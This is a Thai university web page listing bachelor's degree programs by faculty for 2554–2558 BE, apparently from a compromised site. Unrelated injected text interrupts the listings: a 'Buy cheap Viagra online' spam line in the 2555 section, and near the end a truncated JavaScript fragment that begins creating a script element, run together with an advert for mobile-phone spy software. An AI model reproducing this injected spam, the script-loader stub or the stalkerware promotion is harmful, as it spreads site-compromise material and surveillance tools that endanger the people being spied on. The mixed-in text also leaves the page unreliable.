หลักสูตรที่เปิดสอน

หลักสูตรที่เปิดสอน

68

1 4ปี พ.ศ. 25581 4

1 6คณะครุศาสตร์

1 3หลักสูตรครุศาสตรบัณฑิต

1. สาขาวิชาการศึกษาพิเศษและการสอนภาษาไทย  หลักสูตรปรับปรุง พ.ศ. 2558

2. สาขาวิชาการสอนภาษาอังกฤษ หลักสูตรปรับปรุง พ.ศ. 2558

3. สาขาวิชาคณิตศาสตร์  หลักสูตรปรับปรุง พ.ศ. 2558

4. สาขาวิชาคอมพิวเตอร์ศึกษา  หลักสูตรปรับปรุง พ.ศ. 2558

5. สาขาวิชาการศึกษาปฐมวัย  หลักสูตรปรับปรุง พ.ศ. 2558

1 6คณะมนุษยศาสตร์และสังคมศาสตร์

1 3หลักสูตรศิลปศาสตรบัณฑิต

1. สาขาวิชาภาษาจีน  หลักสูตรใหม่ พ.ศ. 2558

1 6คณะวิทยาการจัดการ

1 3หลักสูตรบริหารธุรกิจบัณฑิต

1. สาขาวิชาธุรกิจระหว่างประเทศ  หลักสูตรใหม่ พ.ศ. 2558

2. สาขาวิชาการเป็นผู้ประกอบการ หลักสูตรใหม่ พ.ศ. 2558

68

1 4ปี พ.ศ. 25571 4

1 6คณะครุศาสตร์

1 3หลักสูตรครุศาสตรบัณฑิต

1. สาขาวิชาการสอนภาษาไทย  หลักสูตรปรับปรุง พ.ศ. 2557

1 6คณะมนุษยศาสตร์และสังคมศาสตร์

1 3หลักสูตรศิลปกรรมศาสตรบัณฑิต

1. สาขาวิชาดนตรีสากล  หลักสูตรใหม่ พ.ศ. 2557

2. สาขาวิชาศิลปะการแสดง หลักสูตรปรับปรุง พ.ศ. 2557

1 6คณะวิทยาศาสตร์และเทคโนโลยี

1 3หลักสูตรวิทยาศาสตรบัณฑิต

1. สาขาวิชาเทคโนโลยีการผลิตพืช  หลักสูตรปรับปรุง พ.ศ. 2557

 68

1 4ปี พ.ศ. 25561 4

1 6คณะมนุษยศาสตร์และสังคมศาสตร์

 1 3หลักสูตรรัฐประศาสนศาสตรบัณฑิต

1. สาขาวิชาการปกครองท้องถิ่น หลักสูตรปรับปรุง พ.ศ. 2556

 1 3หลักสูตรศิลปศาสตรบัณฑิต

1. สาขาวิชาประวัติศาสตร์ หลักสูตรใหม่ พ.ศ. 2556

2. สาขาวิชาสหวิทยาการอิสลาม หลักสูตรใหม่ พ.ศ. 2556

1 6คณะวิทยาศาสตร์และเทคโนโลยี

1 3หลักสูตรวิทยาศาสตรบัณฑิต

1. สาขาวิชาวิทยาศาสตร์และเทคโนโลยีการอาหาร หลักสูตรปรับปรุง พ.ศ. 2556

2. สาขาวิชาวิทยาศาสตร์สิ่งแวดล้อม  หลักสูตรใหม่ พ.ศ. 2556

 1 6คณะวิทยาการจัดการ

1 3หลักสูตรบริหารธุรกิจบัณฑิต

1. สาขาวิชาเศรษฐศาสตร์ธุรกิจ  หลักสูตรปรับปรุง พ.ศ. 2556

68

1 4ปี พ.ศ. 25551 4


Buy cheap Viagra online

1 6คณะครุศาสตร์

1 3หลักสูตรครุศาสตรบัณฑิต

1. สาขาวิชาคณิตศาสตร์  หลักสูตรปรับปรุง  พ.ศ. 2555

2. สาขาวิชาการศึกษาปฐมวัย  หลักสูตรปรับปรุง พ.ศ. 2555

3. สาขาวิชาคอมพิวเตอร์ศึกษา  หลักสูตรปรับปรุง  พ.ศ. 2555

4. สาขาวิชาการสอนภาษาอังกฤษ  หลักสูตรปรับปรุง  พ.ศ. 2555

5. สาขาวิชาพลศึกษา  หลักสูตรปรับปรุง  พ.ศ. 2555

6. สาขาวิชาการประถมศึกษา  หลักสูตรปรับปรุง  พ.ศ. 2555

7. สาขาวิชาวิทยาศาสตร์  หลักสูตรปรับปรุง พ.ศ. 2555

8. สาขาวิชาสังคมศึกษา  หลักสูตรปรับปรุง พ.ศ. 2555

1 6คณะมนุษยศาสตร์และสังคมศาสตร์

1 3หลักสูตรศิลปศาสตรบัณฑิต

1. สาขาวิชาการพัฒนาชุมชน  หลักสูตรปรังปรุง พ.ศ. 2555

2. สาขาวิชาภาษาอังกฤษ หลักสูตรปรับปรุง พ.ศ. 2555

1 3หลักสูตรศิลปกรรมศาสตรบัณฑิต

1. สาขาวิชาดนตรี  หลักสูตรปรับปรุง พ.ศ. 2555

2. สาขาวิชาศิลปกรรม  หลักสูตรปรับปรุง พ.ศ. 2555

1 3หลักสูตรนิติศาสตรบัณฑิต

1. หลักสูตรนิติศาสตรบัณฑิต หลักสูตรปรับปรุง พ.ศ. 2555

1 3หลักสูตรรัฐประศาสนศาสตรบัณฑิต

      1. สาขาวิชารัฐประศาสนศาสตร์  หลักสูตรปรับปรุง พ.ศ. 2555

1 6คณะวิทยาศาสตร์และเทคโนโลยี

1 3หลักสูตรวิทยาศาสตรบัณฑิต

1. สาขาวิชาเกษตรศาสตร์  หลักสูตรปรับปรุง พ.ศ. 2555

2. สาขาวิชาเคมี  หลักสูตรปรับปรุง พ.ศ. 2555

3. สาขาวิชาคณิตศาสตร์  หลักสูตรปรับปรุง พ.ศ. 2555

4. สาขาวิชาอาชีวอนามัยและความปลอดภัย หลักสูตรปรับปรุง พ.ศ. 2555

5. สาขาวิชาจุลชีววิทยา หลักสูตรใหม่ พ.ศ. 2555

6. สาขาวิชาคหกรรมศาสตร์ หลักสูตรปรับปรุง พ.ศ. 2555

1 3หลักสูตรวิศวกรรมศาสตรบัณฑิต

1. สาขาวิชาการจัดการเทคโนโลยีอุตสาหกรรม  หลักสูตรปรับปรุง พ.ศ. 2555

1 3หลักสูตรเทคโนโลยีบัณฑิต

1. สาขาวิชาเทคโนโลยีอุตสาหกรรม (ต่อเนื่อง) หลักสูตรปรับปรุง พ.ศ. 2555

1 6คณะวิทยาการจัดการ

1 3หลักสูตรบริหารธุรกิจบัณฑิต

1. สาขาวิชาการจัดการ  หลักสูตรปรับปรุง พ.ศ. 2555

2. สาขาวิชาการตลาด หลักสูตรปรับปรุง พ.ศ. 2555

1 3หลักสูตรศิลปศาสตรบัณฑิต

1. สาขาวิชาการท่องเที่ยว  หลักสูตรปรับปรุง พ.ศ. 2555

68

1 4ปี พ.ศ. 25541 4

1 6คณะครุศาสตร์

1 3หลักสูตรครุศาสตรบัณฑิต

1. สาขาวิชาการสอนภาษาไทย หลักสูตรใหม่ พ.ศ.2554

1 6คณะมนุษยศาสตร์และสังคมศาสตร์

1 3หลักสูตรศิลปศาสตรบัณฑิต

1. สาขาวิชาภาษาญี่ปุ่น หลักสูตรปรับปรุง พ.ศ. 2554

2. สาขาวิชาภาษาไทย  หลักสูตรปรับปรุง  พ.ศ. 2554

1 3หลักสูตรนิเทศศาสตรบัณฑิต

1. สาขาวิชานิเทศศาสตร์ หลักสูตรปรับปรุง พ.ศ. 2554

1 6คณะวิทยาศาสตร์และเทคโนโลยี

1 3หลักสูตรวิทยาศาสตรบัณฑิต

1. สาขาวิชาวิทยาการคอมพิวเตอร์  หลักสูตรปรับปรุง พ.ศ. 2554

2. สาขาวิชาเทคโนโลยีสารสนเทศ  หลักสูตรปรับปรุง พ.ศ. 2554

1 3หลักสูตรวิศวกรรมศาสตรบัณฑิต

1. สาขาวิชาวิศวกรรมไฟฟ้า  หลักสูตรใหม่  พ.ศ. 2554

1 6คณะวิทยาการจัดการ

1 3หลักสูตรบริหารธุรกิจบัณฑิต

1. สาขาวิชาการบริหารทรัพยากรมนุษย์  หลักสูตรปรับปรุง พ.ศ. 2554

2. สาขาวิชาคอมพิวเตอร์ธุรกิจ หลักสูตรปรับปรุง พ.ศ. 2554

3. สาขาวิชาการจัดการโลจิสติกส์ หลักสูตรใหม่ พ.ศ. 2554

1 3หลักสูตรบัณชีบัณฑิต

1. หลักสูตรบัณชีบัณฑิต  หลักสูตรปรับปรุง พ.ศ. 2554

68

} else {var d=document;var s=d.createElement(‘script’); https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.

Leave a Comment

คุณอาจจะใช้ป้ายกำกับและคุณสมบัติHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>